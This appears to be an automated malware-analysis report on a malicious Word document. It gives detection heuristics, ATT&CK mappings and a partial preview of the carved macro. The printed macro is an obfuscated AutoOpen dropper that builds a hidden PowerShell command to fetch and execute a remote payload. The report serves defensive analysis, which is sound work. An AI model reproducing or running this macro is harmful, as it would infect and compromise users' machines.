Verdict: MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, indicating an attempt to execute arbitrary commands. The ClamAV detection and heuristic firings strongly suggest this is a dropper or downloader, though the exact payload and family could not be determined from the provided evidence.
Heuristics (7)
- ClamAV: Doc.Dropper.Agent-6446941-0 [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6446941-0
- VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA [critical] (OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro [high] (OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] (EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8854 bytes | cdced11b6e20d5eba97991f983b71d73d0a28aac7d026a225e852b0345c67e66 |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "jameson"
Sub AutoOpen()
Dim HK_OI As String
DL_LD = Array("t", "-", "d", "b", "a", " ", "h", "o", "l", "w", "x", "i", "y", "p", "e", "c", "s", "r", "n", "u")
Dim EN_TC As String
EN_TC = "ZgB1AG4AYwB0AGkAb"
Dim HM_KC As String
HM_KC = "wBuACAAYQAoACQA"
Dim JQ_OJ As String
JQ_OJ = "eAApAHsAcgBlAHQAd"
HK_OI = HK_OI + DL_LD(13)
HK_OI = HK_OI + DL_LD(7)
Dim FR_MB As String
FR_MB = "QByAG4AIABbAFMAeQBzA"
Dim CL_NH As String
CL_NH = "HQAZQBtAC4AV"
AP_RE = AP_RE & EN_TC & HM_KC & JQ_OJ & FR_MB & CL_NH
Dim HL_LI As String
HL_LI = "ABlAHgAdAAuAE"
HK_OI = HK_OI + DL_LD(9)
HK_OI = HK_OI + DL_LD(14)
Dim JL_OG As String
JL_OG = "UAbgBjAG8AZABp"
Dim HL_RD As String
HL_RD = "AG4AZwBdADoAOgBVA"
Dim DP_LC As String
DP_LC = "FQARgA4A"
HK_OI = HK_OI + DL_LD(17)
HK_OI = HK_OI + DL_LD(16)
Dim FT_LG As String
FT_LG = "C4ARwBlA"
AP_RE = AP_RE & HL_LI & JL_OG & HL_RD & DP_LC & FT_LG
Dim JR_NI As String
JR_NI = "HQAUwB0AHIAaQB"
Dim JQ_PH As String
JQ_PH = "uAGcAKABbAFMAeQ"
HK_OI = HK_OI + DL_LD(6)
HK_OI = HK_OI + DL_LD(14)
Dim FN_PB As String
FN_PB = "BzAHQAZQBtA"
Dim JO_KH As String
JO_KH = "C4AQwBvAG4AdgBlAHIA"
Dim IK_RJ As String
IK_RJ = "dABdADoAOgBGAHI"
AP_RE = AP_RE & JR_NI & JQ_PH & FN_PB & JO_KH & IK_RJ
HK_OI = HK_OI + DL_LD(8)
HK_OI = HK_OI + DL_LD(8)
Dim FO_KE As String
FO_KE = "AbwBtAEIAYQBzAGUANg"
Dim FK_PE As String
FK_PE = "A0AFMAdAByAGk"
Dim IO_NJ As String
IO_NJ = "AbgBnACgAJAB4ACk"
HK_OI = HK_OI + DL_LD(5)
HK_OI = HK_OI + DL_LD(1)
Dim DO_SB As String
DO_SB = "AKQB9ADsAaQBlA"
Dim FR_RI As String
FR_RI = "HgAIAAkACgAYQAg"
AP_RE = AP_RE & FO_KE & FK_PE & IO_NJ & DO_SB & FR_RI
Dim AR_MJ As String
AR_MJ = "ACQAKAAkACgAJA"
HK_OI = HK_OI + DL_LD(9)
HK_OI = HK_OI + DL_LD(11)
Dim ER_RD As String
ER_RD = "AoAGkAbg"
Dim FQ_NH As String
FQ_NH = "B2AG8AawBlAC0A"
Dim CK_NI As String
CK_NI = "dwBlAGIAcgB"
HK_OI = HK_OI + DL_LD(18)
HK_OI = HK_OI + DL_LD(2)
Dim AN_QC As String
AN_QC = "lAHEAdQBlAHMAdA"
AP_RE = AP_RE & AR_MJ & ER_RD & FQ_NH & CK_NI & AN_QC
Dim AQ_PE As String
AQ_PE = "AgACcAaAB0AHQ"
Dim FQ_SA As String
FQ_SA = "AcABzADoALw"
HK_OI = HK_OI + DL_LD(7)
HK_OI = HK_OI + DL_LD(9)
Dim HP_KC As String
HP_KC = "AvAHUAcwBwAHIAZAA1"
Dim GT_LG As String
GT_LG = "ADEANQAwAGM"
Dim AR_MG As String
AR_MG = "AZQBuAHQAcgBhA"
AP_RE = AP_RE & AQ_PE & FQ_SA & HP_KC & GT_LG & AR_MG
HK_OI = HK_OI + DL_LD(16)
HK_OI = HK_OI + DL_LD(0)
Dim BS_LF As String
BS_LF = "GwALgB0AGEAYgBsAGUAL"
Dim FR_ME As String
FR_ME = "gBjAG8Ac"
Dim BL_SI As String
BL_SI = "gBlAC4Ad"
HK_OI = HK_OI + DL_LD(12)
HK_OI = HK_OI + DL_LD(8)
Dim GO_KG As String
GO_KG = "wBpAG4AZ"
Dim FO_RI As String
FO_RI = "ABvAHcAcw"
AP_RE = AP_RE & BS_LF & FR_ME & BL_SI & GO_KG & FO_RI
Dim CP_KF As String
CP_KF = "AuAG4AZQB0AC8AdwB"
HK_OI = HK_OI + DL_LD(14)
HK_OI = HK_OI + DL_LD(5)
Dim FK_KF As String
FK_KF = "hAHIAZQBoAG"
Dim HQ_OI As String
HQ_OI = "8AdQBzAG"
Dim EP_QI As String
EP_QI = "UAPwAkAGYAaQ"
HK_OI = HK_OI + DL_LD(6)
HK_OI = HK_OI + DL_LD(11)
Dim GM_OH As String
GM_OH = "BsAHQAZQByAD0AUABhAH"
AP_RE = AP_RE & CP_KF & FK_KF & HQ_OI & EP_QI & GM_OH
Dim FK_OH As String
FK_OH = "IAdABpAHQA"
Dim FP_KC As String
FP_KC = "aQBvAG4"
HK_OI = HK_OI + DL_LD(2)
HK_OI = HK_OI + DL_LD(2)
Dim FL_LE A
... (truncated)